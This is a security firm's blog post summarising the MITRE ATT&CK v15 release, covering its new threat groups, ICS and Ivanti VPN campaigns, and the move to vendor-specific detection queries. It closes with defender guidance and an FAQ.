MITRE ATT&CK v15, released in April 2024, expands the framework to over 800 software entries, 150+ tracked groups, and 30 campaigns. The release introduces vendor-specific detection syntax - replacing CAR pseudo-code with real-world query languages such as Splunk Processing Language - and adds seven new threat actor groups, three new ICS campaigns, and one new enterprise campaign targeting Ivanti VPNs.
The table below summarises the key changes between ATT&CK v14 and MITRE ATT&CK v15 at a glance.
| Dimension | ATT&CK v14 | ATT&CK v15 |
|---|---|---|
| Tracked groups | 143 | 150+ (7 new) |
| Campaigns | 23 | 30 (7 new) |
| Software entries | ~780 | 800+ |
| Detection content format | CAR pseudo-code | Vendor-specific syntax (SPL, KQL, etc.) |
| ICS campaigns | Previously documented | 3 new additions |
| Enterprise campaigns | Previously documented | 1 new (Cutting Edge / Ivanti VPNs) |
What are the headline changes in MITRE ATT&CK v15?
MITRE ATT&CK v15 now documents up to 800 unique pieces of software, over 150 groups and up to 30 campaigns. One of the key changes that has been made is to the Detections section of MITRE ATT&CK. MITRE are moving away from their Cyber Analytics Repository (CAR) pseudo-code method of sharing detection opportunities for Tactics, Techniques, and Procedures (TTPs) and towards vendor-specific detection code.
Updated Groups
MITRE have introduced 7 new tracked groups, some of the notable ones being Akira and Mustard Tempest.
Akira is a ransomware as a service (RaaS) group that emerged mid-2023, as seen in real-world ESXi exploitation campaigns, and rapidly accumulated victims across healthcare, education, and professional services sectors. By early 2024, Akira had compromised over 250 organisations and extracted approximately $42 million in ransom payments, according to CISA advisory AA24-131A (co-authored with the FBI, Europol EC3, and NCSC Netherlands). The group achieved this by brute forcing VPNs without multi-factor authentication (MFA), typically Cisco SSL VPNs. They orchestrated careful campaigns against hypervisors and SQL servers, rapidly escalating from initial access to encryption within days to weeks, to ensure they evaded detection and maintained their persistence. Akira is known for their 1980s style Data Leak Site (DLS) on the dark web.
Mustard Tempest has operated continuously in the ransomware ecosystem since 2017, sustaining long-running initial access operations across multiple sectors. This threat actor is mainly known to operate as an Initial Access Broker (IAB) by operating the 'SocGholish' malware distribution network. The group has had affiliations with Lockbit and is known to deploy remote access tools.
_For a deep dive analysis of initial access malware, read a recent blog post from our Incident Response team on GootLoader malware which is used as initial access malware._
Changes to Industrial Control Systems (ICS)
MITRE also introduced fresh updates to the ICS side of MITRE ATT&CK, with new Campaigns, Techniques and more.
ICS Campaigns
Three new ICS campaigns highlight the diversity in motivations and the different means that each threat actor can demonstrate during attacks against ICS/Supervisory Control and Data Acquisition (SCADA) systems. These campaigns were formally documented in the April 2024 v15 release.
- 2022 Ukraine Electric Power Attack: This campaign is linked to the prior 2015 and 2016 attacks orchestrated by the Sandworm Team. These attacks were conducted to disrupt substations within the Ukrainian power grid by using a combination of tools known as GOGETTER, Neo-REGEORG and CaddyWiper.
- Triton Safety Instrumented System Attack: This attack was orchestrated against a petrochemical organisation, targeting specific Triconex Safety Controllers. The incident was found due to a safety trip that occurred as a result of the malware.
- Unitronics Defacement Campaign: This was a collection of multiple intrusions across multiple sectors by a newly tracked group in MITRE v15 known as 'CyberAv3ngers' which worked to deface Unitronics Vision Series Programmable Logic Controllers (PLC). The PLCs were found in sectors such as water, wastewater, energy, food and beverage manufacturing and healthcare.
Which enterprise campaigns were added to MITRE ATT&CK v15?
Cutting Edge (Ivanti Connect Secure VPN Exploitation Campaign)
MITRE formally designated this campaign 'Cutting Edge' - the name is MITRE's own designation, not an editorial label. The Cutting Edge campaign began in December 2023, targeting Ivanti Connect Secure (formerly Ivanti Pulse Secure) VPN appliances by exploiting two critical Ivanti Connect Secure vulnerabilities: CVE-2023-46805, an authentication bypass flaw, and CVE-2024-21887, a command injection vulnerability. Together, these two CVEs allowed threat actors to achieve unauthenticated remote code execution on affected appliances.
The campaign was attributed by Mandiant to UNC5221 and by Volexity to UTA0178, both designations referring to a suspected China-nexus espionage group. The campaign affected organisations across government, defence, and technology sectors in the United States, Europe, and Asia-Pacific. CISA issued advisory AA24-060B - "Ivanti Connect Secure and Policy Secure Vulnerabilities" - confirming active exploitation of both CVEs by threat actors.
Notably, MITRE's own NERVE (Networked Experimentation, Research, and Virtualization Environment) network was compromised via the same Ivanti Connect Secure vulnerabilities, disclosed by MITRE in April 2024. The fact that the organisation responsible for the ATT&CK framework itself fell victim to the campaign underscores the severity of the Ivanti Connect Secure vulnerability exposure.
MITRE also introduced multiple minor changes and updates to existing enterprise campaigns.
How has MITRE changed its detection content in ATT&CK v15?
Previously, MITRE used a pseudo-code approach, typically driven by a separate MITRE project known as Cyber Analytics Repository (CAR). MITRE recognise that this was difficult to understand by cyber defenders and have moved towards specific (real-world) query syntax such as Splunk Processing Language. It is worth noting that CAR remains a standalone project - the v15 change is that ATT&CK technique pages now include vendor-native detection snippets alongside generic pseudo-code, rather than replacing CAR entirely.
An example can be found on the detections section of the Execution via PowerShell (T1059.001) technique.
How should defenders use MITRE ATT&CK v15 to improve cyber resilience?
Build a threat model that maps your organisation's high-value assets to the threat actors, TTPs, and detections documented in MITRE ATT&CK v15. Focus on the groups most relevant to your sector - the three new ICS campaigns are particularly relevant to OT/ICS environments, while Akira and Mustard Tempest represent elevated risk for organisations without MFA on VPN endpoints. For UK enterprise and CNI organisations, mapping your threat model to MITRE ATT&CK v15 provides a structured, internationally recognised framework for intelligence-led defence.
From a Precursor Security analyst perspective, the newly tracked groups in v15 pose differentiated risk by sector: Akira has specifically targeted healthcare, education, and financial services organisations; the Sandworm-linked ICS campaigns documented in v15 are directly relevant to UK energy and water utilities operating under the NIS Regulations 2018; and Mustard Tempest's SocGholish campaigns are frequently observed in UK corporate environments. Organisations in these sectors should treat v15 as a prompt to validate detection coverage against these groups specifically.
A practical starting point for any defender:
- Open ATT&CK Navigator and load the v15 layer.
- Filter groups by sector or geography to surface the threat actors most relevant to your organisation.
- Cross-reference each group's listed techniques against your current detection rule set and threat intelligence feeds.
- For any technique lacking a detection, check the new vendor-specific examples in the Detections tab - the v15 SPL and KQL snippets are directly usable in most enterprise SIEMs.
- Log identified gaps and prioritise by technique prevalence or group activity recency.
The Precursor SOC maps all alerting to MITRE ATT&CK and updates detection coverage with each new framework release, including v15. If you would like an assessment of your current detection coverage against the groups and techniques introduced in v15, contact the Precursor SOC team.
Frequently Asked Questions
What changed in MITRE ATT&CK v15?
MITRE ATT&CK v15, released in April 2024, added 7 new threat actor groups (including Akira and Mustard Tempest), 7 new campaigns (3 ICS and 1 enterprise), and expanded the software library to over 800 entries. The most significant architectural change was the shift from CAR pseudo-code detections to vendor-specific query syntax such as Splunk Processing Language (SPL) and Microsoft KQL on technique pages.
What is the Cutting Edge campaign in MITRE ATT&CK v15?
Cutting Edge is MITRE's official designation for the December 2023 campaign that exploited Ivanti Connect Secure VPN appliances using CVE-2023-46805 and CVE-2024-21887. It was attributed to a suspected China-nexus group (UNC5221/UTA0178) and affected government, defence, and technology organisations across the US, Europe, and Asia-Pacific. MITRE's own NERVE research network was compromised in the same campaign, disclosed in April 2024.
How many groups does MITRE ATT&CK v15 track?
MITRE ATT&CK v15 tracks 150 groups in total, up from 143 in v14. The 7 new groups added include Akira (G1030), Mustard Tempest, and CyberAv3ngers, among others.
How does MITRE ATT&CK v15 change detection engineering?
In v15, MITRE moved from generic CAR pseudo-code to vendor-specific detection syntax directly on technique pages. Defenders can now find ready-to-use Splunk SPL, Microsoft KQL, and Elastic EQL query examples alongside MITRE ATT&CK technique descriptions, reducing the translation effort needed to operationalise detections in a real SIEM environment.
How should a SOC team use MITRE ATT&CK v15?
SOC teams should load the v15 layer in ATT&CK Navigator, filter by the threat actor groups most relevant to their sector, and cross-reference those groups' techniques against existing detection rules. Any gap - a technique with no corresponding detection - is a prioritised candidate for new rule development. The vendor-specific detection examples introduced in v15 provide directly usable SIEM queries as a starting point for each gap.